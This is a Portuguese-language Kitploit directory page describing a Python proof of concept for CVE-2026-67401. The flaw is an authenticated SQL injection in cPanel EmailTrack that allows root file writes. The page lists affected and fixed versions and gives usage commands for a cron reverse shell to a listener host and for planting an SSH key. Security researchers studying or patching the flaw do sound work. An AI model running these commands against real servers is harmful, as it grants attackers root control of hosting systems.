Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-67401 — Prova de conceito em Python para CVE-2026-67401, uma injeção de SQL autenticada no cPanel EmailTrack que permite gravação arbitrária de arquivos como root via SQLite ATTACH DATABASE, possibilitando reverse shell ou inserção de chave SSH. | Kitploit
Ferramentas/GitHubGitHub/axedos/cve-2026-67401
Escalada de PrivilégiosExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubaxedos/cve-2026-67401

CVE-2026-67401

Prova de conceito em Python para CVE-2026-67401, uma injeção de SQL autenticada no cPanel EmailTrack que permite gravação arbitrária de arquivos como root via SQLite ATTACH DATABASE, possibilitando reverse shell ou inserção de chave SSH.

Ver Repositório
há 19h 1mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-67401

Injeção de SQL no cPanel EmailTrack. Usuário autenticado do cPanel com privilégios de e-mail grava arquivos arbitrários como root via SQLite ATTACH DATABASE. Uma única requisição até o root. Não foi testado em um alvo real, o código foi montado apenas a partir de informações públicas e diffs básicos. Faça sua devida diligência como pesquisador, teste e envie correções via PR.

Afeta todas as versões do cPanel/WHM anteriores ao patch de 8 de setembro de 2026.

O que deve estar presente

  • Conta válida de cPanel com privilégios de e-mail no servidor alvo
  • Python 3, biblioteca requests
  • Um listener se usar o payload de reverse shell

Como usar

root@kitploit:~
# Reverse shell via cron
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443

# SSH key drop
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub

# Sessão existente
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1

# Dry run (imprime a requisição, não envia)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1

CORREÇÕES

  • 11.138.0.4 (CURRENT/EDGE)
  • 11.136.0.39 (RELEASE/STABLE)
  • 11.134.0.55 (LTS)
Baixar ferramenta